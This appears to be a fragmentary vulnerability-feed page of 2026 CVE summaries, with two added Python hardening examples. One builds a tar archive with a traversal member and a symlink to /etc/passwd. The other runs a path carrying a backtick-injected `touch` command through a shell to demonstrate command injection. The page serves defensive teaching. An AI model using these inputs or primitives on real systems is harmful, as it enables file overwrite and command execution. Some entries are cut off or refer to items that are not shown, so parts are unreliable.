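Four entries above share one primitive, an untrusted path that is joined onto a trusted base: the trestle `-o/--output` argument (CVE-2026-46345), the trestle cache path derived from a remote href (CVE-2026-45725), Jenkins file and zip credential names (CVE-2026-48922), and Langflow's archive symlinks (CVE-2026-7524). The following is an added example and is not code from any of those projects: one containment check serves an output path, a URL-derived cache path, and archive members including symlink targets. The sample archive is constructed; the cache layout (host directory plus cleaned path) is an assumption.

```python
import io
import os
import posixpath
import tarfile
import tempfile
from urllib.parse import unquote, urlsplit


def _contained(base, target):
    base, target = os.path.realpath(base), os.path.realpath(target)
    return target == base or target.startswith(base + os.sep)


def _clean_relative(user_path):
    """Refuse absolute paths, drive letters, NUL and any '..' surviving normpath."""
    p = user_path.replace("\\", "/")       # '..\\x' must not slip past as a name
    if "\x00" in p or p.startswith("/") or (len(p) > 1 and p[1] == ":"):
        raise ValueError(f"absolute or malformed path: {user_path!r}")
    p = posixpath.normpath(p)
    if p in (".", "..") or p.startswith("../"):
        raise ValueError(f"traversal: {user_path!r}")
    return p


def safe_output_path(base_dir, user_arg):
    """-o/--output handling: the result must stay under base_dir."""
    target = os.path.join(base_dir, _clean_relative(user_arg))
    if not _contained(base_dir, target):
        raise ValueError("escapes output directory")
    return target


def cache_path_for_url(cache_dir, href):
    """Cache file for a remote href: keyed by host, path decoded then cleaned."""
    u = urlsplit(href)
    if u.scheme not in ("https", "sftp") or not u.hostname:
        raise ValueError("unsupported href")
    target = os.path.join(cache_dir, u.hostname,
                          _clean_relative(unquote(u.path).lstrip("/")))
    if not _contained(cache_dir, target):
        raise ValueError("escapes cache directory")
    return target


def is_safe(check, *args):
    """Boolean wrapper around the raising checks above."""
    try:
        return bool(check(*args))
    except ValueError:
        return False


def safe_extract(archive, dest):
    """Extract a tar into dest; return the names of members refused because
    their name or link target escapes dest or they are special files."""
    refused = []
    os.makedirs(dest, exist_ok=True)
    with tarfile.open(fileobj=io.BytesIO(archive), mode="r:*") as tar:
        for m in tar.getmembers():
            try:
                if not _contained(dest, os.path.join(dest, _clean_relative(m.name))):
                    raise ValueError("name escapes")
                if m.issym() or m.islnk():
                    # symlink targets resolve from the member's directory,
                    # hard-link targets from the archive root
                    link = m.linkname if m.islnk() else posixpath.join(
                        posixpath.dirname(m.name), m.linkname)
                    if not _contained(dest, os.path.join(dest, _clean_relative(link))):
                        raise ValueError("link escapes")
                elif not (m.isfile() or m.isdir()):
                    raise ValueError("special file")
            except ValueError:
                refused.append(m.name)
                continue
            tar.extract(m, dest, set_attrs=False)  # only after the checks
    return refused


def build_sample_archive():
    """Constructed archive: a good file, a traversal name, an absolute
    symlink and a harmless in-tree symlink."""
    buf = io.BytesIO()
    with tarfile.open(fileobj=buf, mode="w") as tar:
        def add(name, data=b"", kind=tarfile.REGTYPE, linkname=""):
            ti = tarfile.TarInfo(name)
            ti.type, ti.linkname, ti.size = kind, linkname, len(data)
            tar.addfile(ti, io.BytesIO(data) if data else None)
        add("data/ok.txt", b"hello\n")
        add("../escape.txt", b"owned\n")
        add("abs_link", kind=tarfile.SYMTYPE, linkname="/etc/passwd")
        add("data/inner", kind=tarfile.SYMTYPE, linkname="ok.txt")
    return buf.getvalue()


def run_demo():
    return safe_extract(build_sample_archive(), tempfile.mkdtemp(prefix="safe-extract-"))
```

Checking each member immediately before extracting it matters: a symlink written earlier in the archive changes what a later member's path resolves to, which is why `_contained` uses `realpath` against the destination as it exists at that moment.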
CVE-2026-38426 HIGH This Week

Remote code execution in Tasmota firmware (v15.3.0.3 and all earlier releases) stems from an unbounded strcpy() into the fixed 40-byte jpg_task.boundary[40] buffer inside fetch_jpg() in the Scripter driver (xdrv_10_scripter.ino). A network attacker able to reach the device and trigger this code path can overflow the buffer and, per the vendor description, execute arbitrary code on the ESP-based device. Publicly available exploit code exists (a CVE-named GitHub repository), and CISA's SSVC framework rates exploitation as POC with the attack automatable; no active exploitation is confirmed.

RCE Buffer Overflow
NVD GitHub
CVSS 3.1
7.3
EPSS
0.2%
CVE-2026-38422 HIGH This Week

Remote code execution in Tasmota firmware version 15.3.0.3 and earlier allows remote unauthenticated attackers to trigger a stack-based buffer overflow in the fetch_jpg() function of the xdrv_10_scripter.ino scripting driver. The flaw is exposed over the network with low complexity and no privileges required (CVSS 7.3 AV:N/AC:L/PR:N/UI:N), and a GitHub repository named for the CVE is referenced, though no working exploit code was identified in the references at time of analysis. EPSS probability is very low (0.05%, 15th percentile) and the issue is not listed in CISA KEV.

RCE Buffer Overflow Stack Overflow
NVD GitHub
CVSS 3.1
7.3
EPSS
0.0%
CVE-2026-36540 HIGH This Week

Unauthenticated remote command injection in the Netis AC1200 Router (model NC21, firmware V4.0.1.4296) allows any LAN-resident attacker to execute arbitrary OS commands as the router's runtime user via a single HTTP POST to /cgi-bin/skk_set.cgi. The password and new_pwd_confirm parameters are concatenated into a shell invocation without sanitization, and exploitation requires no credentials. No public exploit is identified at time of analysis, though the disclosure repository documents the technique (base64-encoded backtick payloads), and EPSS scoring (0.21%) suggests limited broad exploitation pressure despite the trivial attack complexity.

RCE Command Injection
NVD GitHub
CVSS 3.1
7.3
EPSS
0.2%
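The Raynet entries (an unterminated `find` built from an attacker-controlled path) and the Netis entry (form fields concatenated into a shell invocation) are the same bug from opposite sides of the privilege line. Added example, not code from either vendor: `run_demo` builds a hostile path containing a backtick command inside a temporary directory, runs the string form through the shell and the argv form without one, and reports in which case the embedded `touch` executed. `/usr/sbin/setpass` is a hypothetical helper binary standing in for the router's password tool.

```python
import os
import subprocess
import tempfile


def find_java_vulnerable(search_root: str) -> str:
    """Shell command line assembled from an attacker-controlled path: the
    backticks inside the path are executed before find ever runs."""
    return f"find {search_root} -name java -type f"


def find_java_hardened(search_root: str) -> list:
    """argv form: the path is one argument and is never re-parsed by a shell.
    find reads a leading '-' as an expression, so such paths are anchored."""
    if "\x00" in search_root:
        raise ValueError("NUL byte in path")
    if search_root.startswith("-"):
        search_root = "./" + search_root
    return ["find", search_root, "-name", "java", "-type", "f"]


def set_password_hardened(new_password: str) -> list:
    """Router-style handler: pass the value as its own argv element to a
    hypothetical helper binary; no quoting, no concatenation, no shell."""
    if len(new_password) > 64 or any(ord(c) < 0x20 for c in new_password):
        raise ValueError("password contains control characters or is too long")
    return ["/usr/sbin/setpass", "--", new_password]


def run_demo() -> dict:
    """Run both find forms against a hostile path inside a temp dir and
    report whether the embedded command (touch <marker>) executed."""
    work = tempfile.mkdtemp(prefix="cmdinj-")
    marker = os.path.join(work, "pwned")
    hostile = f"{work}/missing`touch {marker}`"
    subprocess.run(find_java_vulnerable(hostile), shell=True,
                   stdout=subprocess.DEVNULL, stderr=subprocess.DEVNULL)
    shell_injected = os.path.exists(marker)
    if shell_injected:
        os.remove(marker)
    subprocess.run(find_java_hardened(hostile),
                   stdout=subprocess.DEVNULL, stderr=subprocess.DEVNULL)
    return {"shell_injected": shell_injected, "argv_injected": os.path.exists(marker)}
```

Quoting the interpolated value (`shlex.quote`) would also defeat this particular payload, but it keeps the shell in the loop and every future parameter has to be remembered; building argv directly removes the parser the attacker is talking to.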
CVE-2026-40852 HIGH This Week

OS command injection in MB connect line / Helmholz mbNET and REX industrial remote-maintenance routers (mbNET.mini up to 3.0.2, REX200/250 and mbNET/mbNET.rokey up to 8.4.4, REX100 up to 3.0.2) lets a high-privilege authenticated user poison the device's configuration generator so that a tainted value is later passed unsanitized to a system execute call, producing arbitrary command execution with total loss of confidentiality, integrity and availability. The flaw was reported through CERT@VDE (advisory VDE-2026-054) and tracked as EUVD-2026-32151. There is no public exploit identified at time of analysis, EPSS is low (0.07%, 22nd percentile), and CISA's SSVC framework rates current exploitation as none.

RCE Command Injection
NVD
CVSS 3.1
7.2
EPSS
0.1%
CVE-2026-40851 HIGH This Week

Code execution is possible on MB connect line industrial remote-maintenance routers - mbNET/mbNET.rokey, mbNET.mini, and the REX100/REX200/250 families - when a local attacker supplies a specially crafted configuration file on a USB stick that triggers a type-confusion flaw in the device's cfgparser, yielding total loss of confidentiality, integrity, and availability (CVSS 8.4). The flaw requires local/physical access to the device rather than network reach. There is no public exploit identified at time of analysis, and the EPSS score is very low (0.02%, 7th percentile), consistent with the SSVC assessment of no observed exploitation.

RCE
NVD
CVSS 3.1
8.4
EPSS
0.0%
CVE-2025-12686 CRITICAL PATCH Act Now

Remote code execution in Synology BeeStation OS versions before 1.3.2-65648 stems from a classic buffer overflow in the AdminCenter component, the device's web-based management interface. The CVSS 3.1 vector (AV:N/AC:L/PR:N/UI:N) indicates a network-reachable flaw exploitable by unauthenticated attackers with low complexity and no user interaction, yielding full compromise of confidentiality, integrity, and availability (9.8 Critical). There is no public exploit identified at time of analysis, and the issue is not listed in CISA KEV, but the unauthenticated network-RCE profile on a consumer NAS device makes this a high-priority patch target.

RCE Buffer Overflow Synology
NVD
CVSS 3.1
9.8
EPSS
0.2%
CVE-2026-8832 HIGH This Week

Remote code execution in the WPCode WordPress plugin (versions through 2.3.5) lets authenticated author-level users run arbitrary PHP on the server. Because the plugin registers its 'wpcode' custom post type without a dedicated capability_type, WordPress falls back to standard post capabilities, so any author can create and publish PHP snippet posts via the XML-RPC wp.newPost method, which are later passed to eval() when rendered through the [wpcode] shortcode. EPSS is modest at 0.44% (63rd percentile) and there is no public exploit identified at time of analysis, but the low privilege bar and full CIA impact make this a high-priority patch for any multi-author site.

PHP WordPress RCE Code Injection
NVD
CVSS 3.1
8.8
EPSS
0.4%
CVE-2026-6169 HIGH This Week

Remote code execution in the affiliate-toolkit WordPress plugin ("Multi-Network Affiliate & Amazon Product Display") affects versions up to and including 3.8.5, letting authenticated users with Editor-level access or higher run arbitrary PHP on the host. The flaw stems from the bundled BladeOne template engine's runString() method, which compiles attacker-supplied template content into PHP and executes it through eval() with no sanitization or sandboxing. There is no public exploit identified at time of analysis and EPSS sits at a low 0.24%, but the technical impact is total because a successful injection yields full server-side code execution.

PHP WordPress RCE Code Injection
NVD
CVSS 3.1
7.2
EPSS
0.2%
CVE-2025-41669 HIGH PATCH This Week

Arbitrary root code execution in Phoenix Contact PLCnext Control devices (all firmware before 2026.0.3) is reachable by an authenticated low-privileged Engineer user who installs APP packages from the PLCnext Store through the Web-based Management (WBM) interface. Because the device never verifies the integrity or signature of the downloaded app (CWE-347, tagged JWT Attack), a tampered package runs as root and can compromise the integrity and availability of the controller. No public exploit is identified at time of analysis and EPSS is low (0.06%, 18th percentile), but the flaw is network-reachable with low attack complexity and a vendor patch (2026.0.3) is available.

RCE Jwt Attack
NVD
CVSS 4.0
8.7
EPSS
0.1%
CVE-2026-9200 HIGH This Week

Local File Inclusion in the Query Shortcode plugin for WordPress (all versions through 0.2.1) lets authenticated users with contributor-level access or higher coerce the shortcode handler into including and executing arbitrary .php files already present on the server. Because included files are run by the PHP interpreter, this can leak sensitive data, bypass access controls, and escalate to full remote code execution where an attacker can also place a .php file (e.g. via an upload feature). EPSS rates near-term exploitation probability very low (0.07%, 21st percentile) and there is no public exploit identified at time of analysis.

PHP WordPress RCE Information Disclosure LFI
NVD
CVSS 3.1
7.5
EPSS
0.1%
CVE-2026-48962 HIGH PATCH This Week

Arbitrary Perl code execution in the IO::Compress distribution (all versions before 2.220) lets an attacker who controls the output glob string passed to the bundled File::GlobMapper run arbitrary Perl at the calling process's privilege. The output glob is wrapped in double quotes and later handed to Perl's eval STRING, so an embedded double quote escapes the string context and the trailing characters execute as code. This is rated CVSS 7.3 and tagged RCE/Code Injection; no public exploit was identified at time of analysis and EPSS is very low (0.03%), but a vendor patch (2.220) and the fixing commit are publicly available.

RCE Code Injection
NVD GitHub
CVSS 3.1
7.3
EPSS
0.0%
CVE-2026-9207 HIGH PATCH This Week

OS command injection in Tanium Connect lets an authenticated, low-privileged user execute arbitrary commands on the underlying host, yielding full confidentiality, integrity, and availability compromise (CVSS 8.8). The flaw affects Connect branches 5.26, 5.29, and 5.37 below their respective fixed builds and is tagged as RCE/Command Injection. There is no public exploit identified at time of analysis, and EPSS estimates exploitation probability at a low 0.07% (22nd percentile).

RCE Command Injection
NVD
CVSS 3.1
8.8
EPSS
0.1%
CVE-2026-49014 HIGH This Week

Arbitrary code execution in GDAL 3.1.0 through 3.13.0 is reachable through the netCDF driver, where scanForGeometryContainers (frmts/netcdf/netcdfsg.cpp) copies a CF-convention geometry attribute into a fixed-size stack buffer without checking its length. Any service or workflow that feeds attacker-supplied NetCDF files to GDAL can be coerced into overflowing the stack and running attacker code in the process context. No public exploit is identified at time of analysis and EPSS is just 0.01% (3rd percentile), yet the issue carries a CVSS of 7.4 because the outcome is full remote code execution on the host.

RCE Buffer Overflow Stack Overflow
NVD GitHub
CVSS 3.1
7.4
EPSS
0.0%
CVE-2026-44632 Maven CRITICAL PATCH GHSA Act Now

Remote code execution in Yamcs (Yet Another Mission Control System) versions before 5.12.7 allows an authenticated user holding the ChangeMissionDatabase privilege to run arbitrary OS commands on the server host. The flaw lives in the JavaExprAlgorithmExecutionFactory, which dynamically compiles user-supplied algorithm text with the Janino compiler without any sandbox or restrictive ClassLoader, so injected Java (e.g. java.lang.Runtime.exec) executes with the privileges of the Yamcs process. A detailed proof-of-concept exploit using a REST PATCH to override an existing algorithm is publicly available in the vendor advisory; the issue is not listed in CISA KEV.

RCE Java Code Injection
NVD GitHub
CVSS 3.1
9.1
CVE-2026-44174 PHP HIGH PATCH GHSA This Week

Arbitrary method call in Kirby CMS (versions ≤ 4.9.0 and 5.0.0–5.4.0) lets attackers in the pool of authenticated Panel users invoke unintended PHP model methods by abusing REST API search and collection-query parameters such as filter, sort, not, group, pluck, and findBy. Because Kirby did not validate which model attributes a query could reference, an attacker can reach sensitive methods like password() to leak password hashes, root() to disclose absolute server filesystem paths, loginPasswordless() to escalate into another user's account, or delete() to mass-delete queried models. No CVSS score, EPSS probability, or CISA KEV listing is provided in the source data, and no public exploit is identified at time of analysis, though the vendor rates the real-world impact as high.

Privilege Escalation RCE Information Disclosure
NVD GitHub
CVE-2026-43947 npm HIGH PATCH GHSA This Week

Unauthenticated remote code execution in FUXA 1.3.0 (the fuxa-server npm package) lets any network-reachable attacker run arbitrary OS commands on the SCADA/HMI host when secureEnabled is true. The POST /api/runscript endpoint authorizes a request against a stored script's permission, but with test:true it instead compiles and runs attacker-supplied code via Node's Module._compile, so a guest who knows a valid script ID and name (leaked via the unauthenticated GET /api/project endpoint) can execute code with full Node runtime access. Publicly available exploit code exists in the vendor advisory; no CVSS, EPSS, or CISA KEV data is provided.

Authentication Bypass RCE Information Disclosure Node.js
NVD GitHub
CVE-2026-43945 npm HIGH PATCH GHSA This Week

Pre-authentication remote code execution affects FUXA, an open-source web-based SCADA/HMI platform, in versions >= 1.2.11 and < 1.3.1 (the advisory references build v1.3.0-2706). The flaw is a path-confusion authentication bypass: the login middleware performs a substring match against the full request URL (including the query string), so appending a benign-looking parameter such as ?x=/socket.io to any administrative request causes the server to treat it as a public WebSocket handshake and skip the secureEnabled and nodeRedAuthMode checks entirely. When Node-RED is enabled with command-capable nodes, this reaches the /nodered/* admin interface and yields code execution in the container context (advisory states 'as root'). The GitHub Security Advisory (GHSA-p69w-mmfv-xrfj) discloses the exact bypass payload, so publicly available exploit details exist; there is no CISA KEV listing and no public report of active exploitation at time of analysis.

RCE Code Injection
NVD GitHub
CVE-2026-42462 npm HIGH PATCH GHSA This Week

Linked Data Signature forgery in Fedify (the @fedify/fedify ActivityPub server framework) before 2.2.3 lets remote unauthenticated attackers reshape a third-party-signed activity so it is interpreted differently while its signature still verifies. Because the signature covers the canonical RDF graph rather than the JSON-LD serialization, an attacker who has received a signed activity can use JSON-LD keywords (@graph, @reverse, @included) or context-alias tricks to promote, hide, or rewrite fields and have the forged result accepted as authentic. There is no public exploit identified at time of analysis and the issue is not in CISA KEV, but the GitHub Security Advisory documents the exact restructuring techniques in detail.

RCE Canonical
NVD GitHub
CVSS 3.1
7.0
CVE-2026-42089 npm HIGH PATCH GHSA This Week

Arbitrary package installation leading to code execution affects the yeoman-environment npm library (the runtime behind the Yeoman/`yo` scaffolding CLI) in versions >= 2.9.0 and < 6.0.1. The vulnerable `installLocalGenerators()` method silently calls `repository.install()` on caller-supplied package names without any user confirmation, so a downstream CLI that passes attacker-controlled project configuration into this path will install and execute attacker-chosen packages during bootstrap. There is no public exploit identified at time of analysis and the issue is not on CISA KEV; CVSS is 8.6 (high) but exploitation is contingent on how consumers feed configuration into the library.

RCE
NVD GitHub
CVSS 3.1
8.6
CVE-2026-44450 CRITICAL PATCH Act Now

Remote code execution in Lumiverse AI chat application prior to 0.9.7 allows any authenticated user to run arbitrary OS-level commands on the server by abusing the MCP server creation endpoint. Although the endpoint allowlists binary names (node, bun, python3, deno), it forwards user-controlled args unfiltered to the child process, and every allowed binary supports inline code execution flags (-e or -c). No public exploit identified at time of analysis, but the CVSS 9.9 rating reflects the trivial exploit path and the fact that the server binds on all interfaces with a bypassable host-header rebinding check.

RCE
NVD GitHub
CVSS 3.1
9.9
EPSS
0.1%
CVE-2026-48689 CRITICAL Act Now

Remote code execution in FastNetMon Community Edition through 1.2.9 stems from an off-by-one heap write in the pervasively used dynamic_binary_buffer_t class, reachable by anyone who can send NetFlow, sFlow, IPFIX, or BGP traffic to the DDoS-detection appliance. Because the flawed buffer is exercised during BGP encoding/decoding, NetFlow template parsing, and Flow Spec NLRI construction, an unauthenticated network attacker can corrupt adjacent heap metadata and potentially execute arbitrary code. The flaw carries a critical CVSS 9.8 (AV:N/AC:L/PR:N/UI:N), but no public exploit is identified at time of analysis and it is not listed in CISA KEV.

RCE Buffer Overflow Memory Corruption N A
NVD GitHub VulDB
CVSS 3.1
9.8
EPSS
0.0%
CVE-2026-9489 HIGH This Week

NitroSense 3.x before 3.01.3052 contains a Local Privilege Escalation (LPE) vulnerability. The program exposes a Windows Named Pipe that uses a custom protocol to invoke internal functions. However, this Named Pipe is misconfigured, allowing any authenticated local user to execute arbitrary code with NT AUTHORITY\SYSTEM privileges and to delete arbitrary files with SYSTEM privileges. By leveraging this, an attacker can execute arbitrary code on the target system with elevated privileges.

Privilege Escalation RCE Path Traversal Microsoft
NVD
CVSS 4.0
8.5
EPSS
0.0%
CVE-2026-3515 HIGH This Week

Command injection in Prefect 3.6.18's GitHub integration allows authenticated users to execute arbitrary git commands through the unsanitized reference field. The GitHubRepository block concatenates user input directly into git clone commands, enabling attackers to inject malicious options that can lead to SSRF, credential theft, or remote code execution. While no active exploitation is confirmed, the straightforward attack vector and high impact make this a priority for organizations using Prefect's GitHub integration features.

RCE SSRF Gitlab
NVD
CVSS 3.0
8.5
EPSS
0.1%
CVE-2026-9302 LOW POC Monitor

Remote code injection in vps-inventory-monitoring allows authenticated attackers to execute arbitrary PHP code through the VpsTest console command. The vulnerability exists in the eval() function within VpsTest.php, exploitable by manipulating the 'vf' parameter with low attack complexity. Publicly available exploit code exists (GitHub POC published), and the maintainer has not responded to early disclosure attempts. CVSS 6.3 reflects moderate impact across confidentiality, integrity, and availability, with EPSS data unavailable but risk elevated by confirmed POC and unresponsive vendor.

PHP RCE Code Injection
NVD VulDB GitHub
CVSS 4.0
2.1
EPSS
0.1%
CVE-2026-5843 HIGH PATCH This Week

Arbitrary code execution in Docker Desktop's Model Runner on macOS allows any container on the Docker network to escape to the host by serving a malicious model whose config.json points model_file at a Python file. The MLX inference backend uses MLX-LM's importlib-based loader with no trust_remote_code gate and no sandbox, so a pull-and-infer request to model-runner.docker.internal executes attacker code as the Docker Desktop user. No public exploit identified at time of analysis and KEV status is not indicated.

RCE Python Docker Apple Docker Desktop
NVD
CVSS 3.1
8.2
EPSS
0.0%
CVE-2026-5817 HIGH PATCH This Week

Arbitrary code execution in Docker Model Runner's vllm-metal inference backend on macOS allows any container on the Docker network to execute Python code on the host as the Docker Desktop user. The vllm-metal backend hardcodes trust_remote_code=True when loading tokenizers and runs unsandboxed, so any model pulled from an OCI registry can ship attacker-controlled Python that executes when inference is requested via the model-runner.docker.internal API. No public exploit identified at time of analysis, and the issue is not listed in CISA KEV.

RCE Python Docker Apple Docker Desktop
NVD
CVSS 3.1
8.2
EPSS
0.0%
CVE-2026-48700 CRITICAL Monitor

An issue was discovered in all versions of PCManFM-Qt starting from 1.1.0. When a regular file's path is passed as a URI in an org.freedesktop.FileManager1.ShowFolders D-Bus method call, PCManFM-Qt delegates to a different program (based on the file type) without user confirmation. This could be used to achieve code execution or circumvent network namespace restrictions. NOTE: those outcomes are potentially unwanted by most users; however, the behavior of the product does comply with the applicable specification, and a simplistic solution (ensuring that the URI does not name a regular file) may have adverse consequences for I/O.

RCE Pcmanfm Qt
NVD GitHub VulDB
CVSS 4.0
9.3
EPSS
0.0%
CVE-2026-9291 HIGH PATCH This Week

Arbitrary code execution in Amazon Braket Python SDK versions prior to 1.117.0 allows an authenticated attacker with S3 write access to the job output bucket to compromise any client machine that processes those job results. The flaw stems from insecure pickle deserialization in the job results processing component, and while no public exploit has been identified at time of analysis, the impact extends to every downstream consumer of poisoned results. EPSS data is unavailable, but the supply-chain-style propagation across analyst workstations and CI systems materially raises real-world risk.

RCE Deserialization Amazon Braket Python Sdk
NVD GitHub
CVSS 3.1
7.1
EPSS
0.3%
CVE-2026-8992 HIGH This Week

Remote code execution in Ivanti Secure Access Client versions prior to 22.8R6 allows unauthenticated attackers to run arbitrary code on endpoints by exploiting improper TLS certificate validation, contingent on user interaction (UI:R). No public exploit identified at time of analysis, but the CVSS 8.8 rating and Ivanti's own advisory disclosure mark this as a high-priority client-side risk for organizations using the VPN client.

RCE Ivanti Secure Access Client
NVD
CVSS 3.1
8.8
EPSS
0.1%
CVE-2026-44417 PATCH Monitor

The fix for CVE-2025-48913 ("Apache CXF: Untrusted JMS configuration can lead to RCE") was not complete, meaning that another path in the code might lead to code execution capabilities if untrusted users are allowed to configure JMS for Apache CXF. Users are recommended to upgrade to versions 4.2.1, 4.1.6 or 3.6.11, which fix this issue.

RCE Apache Apache Cxf
NVD VulDB
CVSS 3.1
7.5
EPSS
0.1%
CVE-2026-9264 PATCH Awaiting Data

A cross-site scripting (XSS) vulnerability in SketchUp 2026's Dynamic Components feature allows remote code execution and local file exfiltration through maliciously crafted SKP files. The vulnerability stems from improper input sanitization in the component options window, enabling attackers to execute arbitrary system commands and read local files without user interaction by exploiting an embedded Internet Explorer 11 browser.

XSS RCE Information Disclosure LFI Sketchup
NVD
CVSS 3.1
9.3
EPSS
0.0%
CVE-2026-36228 Awaiting Data

Buffer Overflow vulnerability in Easy Chat Server 3.1 allows a remote attacker to obtain sensitive information and execute arbitrary code via the chat message functionality.

RCE Buffer Overflow N A
NVD GitHub
CVSS 3.1
7.3
EPSS
0.2%
CVE-2026-37470 Awaiting Data

An issue in ClipBucket v5 v.5.5.2 allows an attacker to execute arbitrary code via the Authentication interface, login page endpoint and HTTP response security headers components.

RCE N A
NVD
CVSS 3.1
7.3
EPSS
0.0%
CVE-2026-36227 Awaiting Data

Directory Traversal vulnerability in Easy Chat Server 3.1 allows a remote attacker to obtain sensitive information and execute arbitrary code via the UserName parameter.

RCE Path Traversal N A
NVD GitHub
CVSS 3.1
6.5
EPSS
0.1%
CVE-2026-46701 npm HIGH PATCH GHSA This Week

Unauthenticated cross-origin MCP tool invocation in Network-AI v5.4.4 allows a remote attacker to lure a victim to a malicious web page that silently invokes any of the 22 exposed MCP tools (including config_set, agent_spawn, blackboard_write, and token_create/revoke) against the victim's locally running MCP SSE server. The vulnerability stems from an empty default secret combined with a wildcard CORS policy, and publicly available exploit code exists in the GHSA advisory demonstrating end-to-end exploitation. No CISA KEV listing yet and EPSS data was not provided, but the published PoC and trivial attack mechanics make this a meaningful risk for any user running the default Docker deployment.

RCE Python Docker
NVD GitHub
CVSS 3.1
7.6
CVE-2026-46703 LIB CRITICAL PATCH GHSA Act Now

Arbitrary file write on the host in Boxlite sandbox service versions prior to 0.9.0 allows attackers to escape the OCI image extraction root via crafted symlink entries in layer tarballs, enabling remote code execution on the host (typically as root). Exploitation requires a user to pull and load a malicious OCI image distributed through registries such as DockerHub. Publicly available exploit code exists (vendor-published PoC); no public exploit identified in CISA KEV at time of analysis.

RCE Python Path Traversal
NVD GitHub
CVSS 3.1
9.6
CVE-2026-46695 LIB CRITICAL PATCH GHSA Act Now

Sandbox escape in Boxlite versions prior to 0.9.0 lets untrusted code running inside the lightweight VM remount host-shared virtiofs directories from read-only to read-write, enabling arbitrary writes to host files that operators believed were protected. Because the container is granted all 41 Linux capabilities (including CAP_SYS_ADMIN), a trivial 'mount -o remount,rw' bypasses the client-side MS_RDONLY enforcement, and in AI-agent deployments this leads to host code execution by tampering with mounted code, virtualenvs, or credentials. Publicly available exploit code exists (working PoC published in the GHSA advisory) and the issue carries a CVSS 10.0 with scope change; no public exploit identified at time of analysis in CISA KEV.

Authentication Bypass RCE Python Docker Node.js
NVD GitHub
CVSS 3.1
10.0
CVE-2026-46640 PHP HIGH PATCH GHSA This Week

Arbitrary PHP code execution in Twig templating engine versions 3.15.0 through 3.25.x allows attackers who control template source to inject raw PHP into the compiled template via the `_self.(<string>)` dynamic-attribute macro-reference path, fully bypassing the SandboxExtension. The flaw executes injected code at template-load time, before any SecurityPolicy check runs, rendering even a globally-enabled empty allowlist sandbox ineffective. No public exploit identified at time of analysis, but the vendor advisory describes the bypass mechanism in enough detail that PoC development is straightforward.

PHP RCE Code Injection
NVD GitHub
CVE-2026-6960 CRITICAL Act Now

Unauthenticated arbitrary file upload in the BookingPress Pro WordPress plugin (versions ≤5.6) enables remote code execution by abusing missing file type validation in the bookingpress_validate_submitted_booking_form_func function. Exploitation requires the booking form to include a signature custom field, but otherwise needs no authentication or user interaction. No public exploit identified at time of analysis, though Wordfence's disclosure and the CWE-434 pattern make weaponization straightforward.

WordPress RCE File Upload Bookingpress Appointment Booking Pro
NVD VulDB
CVSS 3.1
9.8
EPSS
0.1%
CVE-2026-46634 PHP MEDIUM PATCH GHSA This Month

Sandbox escape in Twig 3.9.0-3.25.x allows any attacker with template authoring access to fully bypass `SourcePolicyInterface`-driven security policies, enabling OS command execution via `|map("system")` and secret disclosure via `constant()`. The bypass occurs because `Environment::createTemplate()` compiles inline strings under a synthesized name (`__string_template__<hash>`) that name/path-based `SourcePolicy` implementations do not recognize, causing `checkSecurity()` to silently become a no-op on the inner template. No public exploit has been identified at time of analysis, though the vendor advisory provides sufficient technical detail for reproduction, and the RCE tag confirms the potential impact is critical for affected configurations.

RCE
NVD GitHub
CVE-2026-46633 PHP CRITICAL PATCH GHSA Act Now

`{% use %}` tags to break out of compiled cache file string literals and execute arbitrary PHP code. The flaw bypasses the Twig sandbox entirely because `SecurityPolicy` unconditionally permits `{% use %}` regardless of `allowedTags` configuration. No public exploit identified at time of analysis, but the GitHub Security Advisory (GHSA-7p85-w9px-jpjp) discloses the full exploitation primitive.

PHP RCE Code Injection
NVD GitHub
CVE-2026-8426 HIGH This Week

Remote code execution in Concrete CMS 9.5.0 and earlier is achievable through a CSRF flaw in the /dashboard/extend/update/prepare_remote_upgrade/<remoteMPID> endpoint, which fails to validate anti-CSRF tokens. An attacker who controls a marketplace package matching an item ID already installed on the victim site can overwrite package PHP files and trigger the upgrade() method via a single navigation by a privileged admin, resulting in code execution as the web server user. No public exploit identified at time of analysis, though the vendor (Concrete CMS security team) has acknowledged the issue and rated it 7.5 (CVSS 4.0).

PHP RCE CSRF
NVD
CVSS 4.0
7.5
EPSS
0.1%
CVE-2026-8421 HIGH This Week

Cross-site request forgery in Concrete CMS 9.5.0 and earlier allows remote attackers to coerce an authenticated administrator with canInstallPackages permission into installing an attacker-controlled package, resulting in remote code execution as the web server user. The flaw resides in the install_package() method of the dashboard's extend/install.php controller, which lacks CSRF token validation. No public exploit identified at time of analysis, and the issue is not listed in CISA KEV.

PHP RCE CSRF
NVD
CVSS 4.0
7.5
EPSS
0.1%
CVE-2026-46673 Cargo HIGH PATCH GHSA This Week

Denial-of-service via unchecked memory allocation in russh (Rust SSH library) versions <= 0.60.2 allows local SSH agent peers to trigger uncontrolled buffer growth by sending oversized frame length values, and in pre-0.58.0 releases the same CryptoVec allocation path was reachable from remote SSH transport and zlib decompression buffers. The flaw stems from CryptoVec performing unchecked capacity growth, unchecked length arithmetic, and unsafe allocation/locking calls including NonNull::new_unchecked on potentially failed allocations, which can abort the process under memory pressure. Publicly available exploit code exists in the form of researcher-supplied PoC tests demonstrating both rejection on patched code and crash behavior on historical versions; no public exploit identified at time of analysis for active campaigns and the issue is not listed in CISA KEV.

RCE Denial Of Service SSH
NVD GitHub
CVSS 3.1
7.5
CVE-2026-46618 Go MEDIUM PATCH GHSA This Month

Arbitrary command execution in Fission's builder component (pkg:go/github.com/fission/fission <= 1.22.0) allows any principal with create or update privileges on Environment CRDs to redirect the builder pod to execute any binary reachable via $PATH inside the builder image. The vulnerable call site at pkg/builder/builder.go:254 passes the unsanitized Environment.spec.builder.command value directly to exec.Command after a strings.Fields split, enabling attackers to specify paths such as /bin/sh -c '...' as the build command. No public exploit has been identified at time of analysis, but the patch is confirmed released in v1.23.0 and the exploit primitive requires only a single Kubernetes API write to trigger.

RCE Command Injection
NVD GitHub
CVE-2026-8135 HIGH This Week

Remote code execution in Concrete CMS versions 5.0 through 9.5.0 allows a high-privileged administrator to bypass the platform's `_fromCIF` deserialization guard by submitting malicious payloads through the REST API instead of standard form POST requests. The flaw resides in the ExpressEntryList block controller (CWE-502) and stores a serialized PHP gadget in the `filterFields` database column, which is unmarshalled when another administrator subsequently views or edits the block, leading to full server takeover. No public exploit identified at time of analysis, and the issue is not present in CISA KEV.

PHP RCE Deserialization
NVD VulDB
CVSS 4.0
8.9
EPSS
0.1%
CVE-2026-8134 CRITICAL Act Now

